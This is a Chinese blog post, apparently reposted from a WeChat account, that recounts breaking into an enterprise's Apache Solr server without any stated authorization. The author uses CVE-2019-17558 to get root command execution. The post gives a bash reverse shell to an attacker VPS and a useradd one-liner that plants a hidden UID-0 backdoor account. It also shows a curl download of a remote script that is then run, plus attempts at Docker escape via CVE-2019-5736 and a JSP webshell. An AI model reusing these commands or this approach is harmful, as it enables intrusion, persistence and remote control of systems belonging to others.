从RCE到尝试docker逃逸的曲折之路

admin 2022年3月22日10:17:43评论62 views字数 856阅读2分51秒阅读模式

从RCE到尝试docker逃逸的曲折之路

0x01 前言

日常日站,在测试某企业的时候扫描器突然发生反应,发现个solr,一个偶然,让本少写文章的菜鸡开始这篇文章。

0x02 前戏

看了看solr的版本


从RCE到尝试docker逃逸的曲折之路


正好之前研究过一段时间的solr的一些rce,挨个试试。


从RCE到尝试docker逃逸的曲折之路


在一顿操作后,啪的一下很快哈,找到一个CVE-2019-17558可以利用

0x03 命令执行

尝试使用CVE-2019-17558脚本执行命令


从RCE到尝试docker逃逸的曲折之路

运气爆棚直接就是root权限,我自己都不明白为啥是root
兴奋之极赶紧反弹shell呀

bash -i >& /dev/tcp/xx.xx.169.148/1234 0>&1

从RCE到尝试docker逃逸的曲折之路


报错500,当时我就懵逼了
看了看自己的vps,发现啥反应都没有,估计是poc不支持,换了好几个都没用,咋办呀
很快哈,看一下ssh开了没,开了的话直接创个用户直接连上去不就行了


从RCE到尝试docker逃逸的曲折之路


开了,开搞,一句话创建用户设置密码并给root权限

useradd -p 0`openssl passwd -1 -salt 'abc' cqrdpass` -u 0  -o -g root -G root -s /bin/bash -d /usr/bin/cqrd cqrd

看一下/etc/passwd


从RCE到尝试docker逃逸的曲折之路


是....
连接的时候我直接去世


从RCE到尝试docker逃逸的曲折之路


去查了一下发现是设置过ssh配置文件,这可咋整


从RCE到尝试docker逃逸的曲折之路


我决定在试试反弹shell

0x04 再次尝试

这次换一种方法,直接在vps上的web下载到本地

curl xx.xx.169.148/123.sh -o 123.sh

爆了500


从RCE到尝试docker逃逸的曲折之路


看一下目录


从RCE到尝试docker逃逸的曲折之路


ohhhh,上传上去了
然后就是
给权限
执行
bash ./123.sh


从RCE到尝试docker逃逸的曲折之路


当我执行第二个命令的时候我又去世了


从RCE到尝试docker逃逸的曲折之路


居然是docker,试试CVE-2019-5736


从RCE到尝试docker逃逸的曲折之路


发现可以,但是...然后呢?


从RCE到尝试docker逃逸的曲折之路


仔细一看发现需要别人启动才会触发


从RCE到尝试docker逃逸的曲折之路


这一等就是一天,发现什么鬼都没弹,还时不时的被别的ip访问而断开
于是我决定,不搞了收工。


从RCE到尝试docker逃逸的曲折之路

结语

感觉这一次实战学习到了很多,期间还试过jsp码子上到webapp上面连接,但是发现不行,还是有很多的问题没有解决,我还是需要多多学习,告辞!

从RCE到尝试docker逃逸的曲折之路

本文始发于微信公众号(疯猫网络):从RCE到尝试docker逃逸的曲折之路

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月22日10:17:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从RCE到尝试docker逃逸的曲折之路http://cn-sec.com/archives/503984.html

发表评论

匿名网友 填写信息